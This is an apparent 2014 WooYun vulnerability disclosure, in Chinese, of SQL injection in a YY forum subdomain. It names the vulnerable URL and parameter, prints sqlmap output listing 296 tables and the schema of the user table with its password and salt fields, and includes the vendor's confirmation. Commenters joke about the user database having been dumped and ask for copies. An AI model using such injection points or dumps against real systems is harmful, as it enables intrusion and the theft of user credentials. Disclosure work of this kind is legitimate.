YY子站SQL注入(十几万用户数据泄露)

有一天看到YY那么多美女,然后就....

来几张妹纸照片

哎,表示本人什么都没干

注入地址：http://bbs.1931.yy.com/uc_server/avatar.php?uid=26&size=middle uid=26

SLQMAP神器直接爆裤

Database: dream_bbs

[296 tables]

+-----------------------------------+

| bbs_common_admincp_cmenu |

| bbs_common_admincp_group |

| bbs_common_admincp_member |

| bbs_common_admincp_perm |

| bbs_common_admincp_session |

| bbs_common_admingroup |

| bbs_common_adminnote |

| bbs_common_advertisement |

| bbs_common_advertisement_custom |

| bbs_common_banned |

| bbs_common_block |

| bbs_common_block_favorite |

| bbs_common_block_item |

| bbs_common_block_item_data |

| bbs_common_block_permission |

| bbs_common_block_pic |

| bbs_common_block_style |

| bbs_common_block_xml |

| bbs_common_cache |

| bbs_common_card |

| bbs_common_card_log |

| bbs_common_card_type |

| bbs_common_connect_guest |

| bbs_common_credit_log |

| bbs_common_credit_log_field |

| bbs_common_credit_rule |

| bbs_common_credit_rule_log |

| bbs_common_credit_rule_log_field |

| bbs_common_cron |

| bbs_common_devicetoken |

| bbs_common_district |

| bbs_common_diy_data |

| bbs_common_domain |

| bbs_common_failedip |

| bbs_common_failedlogin |

| bbs_common_friendlink |

| bbs_common_grouppm |

| bbs_common_invite |

| bbs_common_magic |

| bbs_common_magiclog |

| bbs_common_mailcron |

| bbs_common_mailqueue |

| bbs_common_member |

| bbs_common_member_action_log |

| bbs_common_member_connect |

| bbs_common_member_count |

| bbs_common_member_crime |

| bbs_common_member_field_forum |

| bbs_common_member_field_home |

| bbs_common_member_forum_buylog |

| bbs_common_member_grouppm |

| bbs_common_member_log |

| bbs_common_member_magic |

| bbs_common_member_medal |

| bbs_common_member_newprompt |

| bbs_common_member_profile |

| bbs_common_member_profile_setting |

| bbs_common_member_security |

| bbs_common_member_secwhite |

| bbs_common_member_stat_field |

| bbs_common_member_status |

| bbs_common_member_validate |

| bbs_common_member_verify |

| bbs_common_member_verify_info |

| bbs_common_myapp |

| bbs_common_myinvite |

| bbs_common_mytask |

| bbs_common_nav |

| bbs_common_onlinetime |

| bbs_common_optimizer |

| bbs_common_patch |

| bbs_common_plugin |

| bbs_common_pluginvar |

| bbs_common_process |

| bbs_common_regip |

| bbs_common_relatedlink |

| bbs_common_remote_port |

| bbs_common_report |

| bbs_common_searchindex |

| bbs_common_seccheck |

| bbs_common_secquestion |

| bbs_common_session |

| bbs_common_setting |

| bbs_common_smiley |

| bbs_common_sphinxcounter |

| bbs_common_stat |

| bbs_common_statuser |

| bbs_common_style |

| bbs_common_stylevar |

| bbs_common_syscache |

| bbs_common_tag |

| bbs_common_tagitem |

| bbs_common_task |

| bbs_common_taskvar |

| bbs_common_template |

| bbs_common_template_block |

| bbs_common_template_permission |

| bbs_common_uin_black |

| bbs_common_usergroup |

| bbs_common_usergroup_field |

| bbs_common_visit |

| bbs_common_word |

| bbs_common_word_type |

| bbs_connect_disktask |

| bbs_connect_feedlog |

| bbs_connect_memberbindlog |

| bbs_connect_postfeedlog |

| bbs_connect_tthreadlog |

| bbs_dsu_paulsign |

| bbs_dsu_paulsignemot |

| bbs_dsu_paulsignset |

| bbs_forum_access |

| bbs_forum_activity |

| bbs_forum_activityapply |

| bbs_forum_announcement |

| bbs_forum_attachment |

| bbs_forum_attachment_0 |

| bbs_forum_attachment_1 |

| bbs_forum_attachment_2 |

| bbs_forum_attachment_3 |

| bbs_forum_attachment_4 |

| bbs_forum_attachment_5 |

| bbs_forum_attachment_6 |

| bbs_forum_attachment_7 |

| bbs_forum_attachment_8 |

| bbs_forum_attachment_9 |

| bbs_forum_attachment_exif |

| bbs_forum_attachment_unused |

| bbs_forum_attachtype |

| bbs_forum_bbcode |

| bbs_forum_collection |

| bbs_forum_collectioncomment |

| bbs_forum_collectionfollow |

| bbs_forum_collectioninvite |

| bbs_forum_collectionrelated |

| bbs_forum_collectionteamworker |

| bbs_forum_collectionthread |

| bbs_forum_creditslog |

| bbs_forum_debate |

| bbs_forum_debatepost |

| bbs_forum_faq |

| bbs_forum_filter_post |

| bbs_forum_forum |

| bbs_forum_forum_threadtable |

| bbs_forum_forumfield |

| bbs_forum_forumrecommend |

| bbs_forum_groupcreditslog |

| bbs_forum_groupfield |

| bbs_forum_groupinvite |

| bbs_forum_grouplevel |

| bbs_forum_groupuser |

| bbs_forum_hotreply_member |

| bbs_forum_hotreply_number |

| bbs_forum_imagetype |

| bbs_forum_medal |

| bbs_forum_medallog |

| bbs_forum_memberrecommend |

| bbs_forum_moderator |

| bbs_forum_modwork |

| bbs_forum_newthread |

| bbs_forum_onlinelist |

| bbs_forum_order |

| bbs_forum_poll |

| bbs_forum_polloption |

| bbs_forum_polloption_image |

| bbs_forum_pollvoter |

| bbs_forum_post |

| bbs_forum_post_location |

| bbs_forum_post_moderate |

| bbs_forum_post_tableid |

| bbs_forum_postcache |

| bbs_forum_postcomment |

| bbs_forum_postlog |

| bbs_forum_poststick |

| bbs_forum_promotion |

| bbs_forum_ratelog |

| bbs_forum_relatedthread |

| bbs_forum_replycredit |

| bbs_forum_rsscache |

| bbs_forum_sofa |

| bbs_forum_spacecache |

| bbs_forum_statlog |

| bbs_forum_thread |

| bbs_forum_thread_moderate |

| bbs_forum_threadaddviews |

| bbs_forum_threadcalendar |

| bbs_forum_threadclass |

| bbs_forum_threadclosed |

| bbs_forum_threaddisablepos |

| bbs_forum_threadhidelog |

| bbs_forum_threadhot |

| bbs_forum_threadimage |

| bbs_forum_threadlog |

| bbs_forum_threadmod |

| bbs_forum_threadpartake |

| bbs_forum_threadpreview |

| bbs_forum_threadprofile |

| bbs_forum_threadprofile_group |

| bbs_forum_threadrush |

| bbs_forum_threadtype |

| bbs_forum_trade |

| bbs_forum_tradecomment |

| bbs_forum_tradelog |

| bbs_forum_typeoption |

| bbs_forum_typeoptionvar |

| bbs_forum_typevar |

| bbs_forum_warning |

| bbs_home_album |

| bbs_home_album_category |

| bbs_home_appcreditlog |

| bbs_home_blacklist |

| bbs_home_blog |

| bbs_home_blog_category |

| bbs_home_blog_moderate |

| bbs_home_blogfield |

| bbs_home_class |

| bbs_home_click |

| bbs_home_clickuser |

| bbs_home_comment |

| bbs_home_comment_moderate |

| bbs_home_docomment |

| bbs_home_doing |

| bbs_home_doing_moderate |

| bbs_home_favorite |

| bbs_home_feed |

| bbs_home_feed_app |

| bbs_home_follow |

| bbs_home_follow_feed |

| bbs_home_follow_feed_archiver |

| bbs_home_friend |

| bbs_home_friend_request |

| bbs_home_friendlog |

| bbs_home_notification |

| bbs_home_pic |

| bbs_home_pic_moderate |

| bbs_home_picfield |

| bbs_home_poke |

| bbs_home_pokearchive |

| bbs_home_share |

| bbs_home_share_moderate |

| bbs_home_show |

| bbs_home_specialuser |

| bbs_home_userapp |

| bbs_home_userappfield |

| bbs_home_visitor |

| bbs_mobile_setting |

| bbs_mobileoem_member |

| bbs_mobileoem_pushthreads |

| bbs_portal_article_content |

| bbs_portal_article_count |

| bbs_portal_article_moderate |

| bbs_portal_article_related |

| bbs_portal_article_title |

| bbs_portal_article_trash |

| bbs_portal_attachment |

| bbs_portal_category |

| bbs_portal_category_permission |

| bbs_portal_comment |

| bbs_portal_comment_moderate |

| bbs_portal_rsscache |

| bbs_portal_topic |

| bbs_portal_topic_pic |

| bbs_security_evilpost |

| bbs_security_eviluser |

| bbs_security_failedlog |

| bbs_ucenter_admins |

| bbs_ucenter_applications |

| bbs_ucenter_badwords |

| bbs_ucenter_domains |

| bbs_ucenter_failedlogins |

| bbs_ucenter_feeds |

| bbs_ucenter_friends |

| bbs_ucenter_mailqueue |

| bbs_ucenter_memberfields |

| bbs_ucenter_members |

| bbs_ucenter_mergemembers |

| bbs_ucenter_newpm |

| bbs_ucenter_notelist |

| bbs_ucenter_pm_indexes |

| bbs_ucenter_pm_lists |

| bbs_ucenter_pm_members |

| bbs_ucenter_pm_messages_0 |

| bbs_ucenter_pm_messages_1 |

| bbs_ucenter_pm_messages_2 |

| bbs_ucenter_pm_messages_3 |

| bbs_ucenter_pm_messages_4 |

| bbs_ucenter_pm_messages_5 |

| bbs_ucenter_pm_messages_6 |

| bbs_ucenter_pm_messages_7 |

| bbs_ucenter_pm_messages_8 |

| bbs_ucenter_pm_messages_9 |

| bbs_ucenter_protectedmembers |

| bbs_ucenter_settings |

| bbs_ucenter_sqlcache |

| bbs_ucenter_tags |

| bbs_ucenter_vars |

+-----------------------------------+

Database: dream_bbs

Table: bbs_ucenter_members

[16 columns]

+-------------------+-------------------------+

| Column | Type |

+-------------------+-------------------------+

| avatar_big_url | varchar(255) |

| avatar_middle_url | varchar(255) |

| avatar_small_url | varchar(255) |

| email | char(32) |

| lastloginip | int(10) |

| lastlogintime | int(10)%20unsigned |

| myid | char(30) |

| myidkey | char(16) |

| password | char(32) |

| regdate | int(10)%20unsigned |

| regip | char(15) |

| salt | char(6) |

| secques | char(8) |

| udbname | char(20) |

| uid | mediumint(8)%20unsigned |

| username | char(15) |

+-------------------+-------------------------+

官方比我懂,表示本人什么都没干。求YY给个宠物仔

厂商回应：

危害等级：高

漏洞Rank：15

确认时间：2014-07-21 17:34

厂商回复：

感谢对于欢聚时代安全工作的支持，我们会尽快修复

最新状态：

暂无

1. 2014-07-21 14:43 | 黑马 ( 路人 | Rank:0 漏洞数:2 | 不要问我从哪里来，我是黑暗中的光明者！)

   0

   公布吧，我看看

   1# 回复此人

2. 2014-07-21 15:07 | 信通联盟支付(乌云厂商)

   0

   求裤子

   2# 回复此人

3. 2014-07-21 15:12 | Ton7BrEak ( 普通白帽子 | Rank:330 漏洞数:70 | ☁ 我要继续努力！)

   0

   @信通联盟支付 这是厂商么？~= =#

   3# 回复此人

4. 2014-07-21 15:16 | 泳少 ( 普通白帽子 | Rank:257 漏洞数:84 | ★ 梦想这条路踏上了，跪着也要...)

   0

   目测楼主脱裤了。。你觉得呢？@U神

   4# 回复此人

5. 2014-07-21 15:22 | Ton7BrEak ( 普通白帽子 | Rank:330 漏洞数:70 | ☁ 我要继续努力！)

   0

   @泳少 我觉得她肯定脱裤子了~ 我这是要回家改密码的节奏啊！不会又是明文密码吧？

   5# 回复此人

6. 2014-07-21 15:37 | MT哥 ( 实习白帽子 | Rank:70 漏洞数:35 | 苦逼的搬砖工兼职洗盘子，穷屌丝、小菜 -A...)

   0

   @泳少 已脱 我这有

   6# 回复此人

7. 2014-07-21 15:47 | 泳少 ( 普通白帽子 | Rank:257 漏洞数:84 | ★ 梦想这条路踏上了，跪着也要...)

   0

   @MT哥 脱裤子的都不是好白帽子。。大家觉得他。。。咳咳。。

   7# 回复此人

8. 2014-07-21 15:56 | U神 ( 核心白帽子 | Rank:1375 漏洞数:152 | 乌云核心菜鸟，此号处于联盟托管中....)

   0

   @泳少 ???神马情况？

   8# 回复此人

9. 2014-07-21 16:00 | Jn· ( 路人 | Rank:30 漏洞数:14 | 本小菜很可爱，如果不服你TM来打我啊--哎呀...)

   0

   @泳少 我都说了，我是好人,不知道叫脱裤子.脱了裤子你就给看着...

   9# 回复此人

10. 2014-07-21 16:07 | 泳少 ( 普通白帽子 | Rank:257 漏洞数:84 | ★ 梦想这条路踏上了，跪着也要...)

    0

    @ Jn· 嗯哪。。。我是路过的。。。MT哥。。我靠。。。已拖。。咳咳

    10# 回复此人

11. 2014-07-21 16:27 | CoffeeSafe ( 普通白帽子 | Rank:142 漏洞数:37 )

    0

    开门！收电费了！

    11# 回复此人

12. 2014-07-21 17:31 | 小磊 ( 路人 | Rank:1 漏洞数:3 | 为了一个安全技术梦。)

    0

    脱下裤子　里面是什么颜色的。

    12# 回复此人

13. 2014-07-21 19:47 | Xder神奇的蛋蛋 ( 路人 | Rank:0 漏洞数:1 | 嘿嘿)

    0

    @MT哥 你确定有？

    13# 回复此人

14. 2014-07-22 08:08 | Ev1l ( 实习白帽子 | Rank:68 漏洞数:20 | 问题真实存在但影响不大。联系邮箱security...)

    0

    @U神 @ Jn· JJ对这些很感兴趣呢……是吧U神

    14# 回复此人

15. 2014-08-01 05:44 | Hannibal ( 路人 | Rank:5 漏洞数:1 | 我很乖，我不嗨。)

    0

    @MT哥 只要你不要把你家的兄弟亮出来给我看，我就要求裤子

    15# 回复此人

16. 2014-08-21 20:07 | 大白菜 ( 实习白帽子 | Rank:52 漏洞数:19 )

    0

    @MT哥 求裤子~

    16# 回复此人

17. 2014-10-05 16:38 | 风花雪月 ( 实习白帽子 | Rank:67 漏洞数:49 | []+[]|[]-[][][][][]%[][]|[]/[]%[][]|[]/[...)

    0

    你说你什么也没干 看我信不信？

    17# 回复此人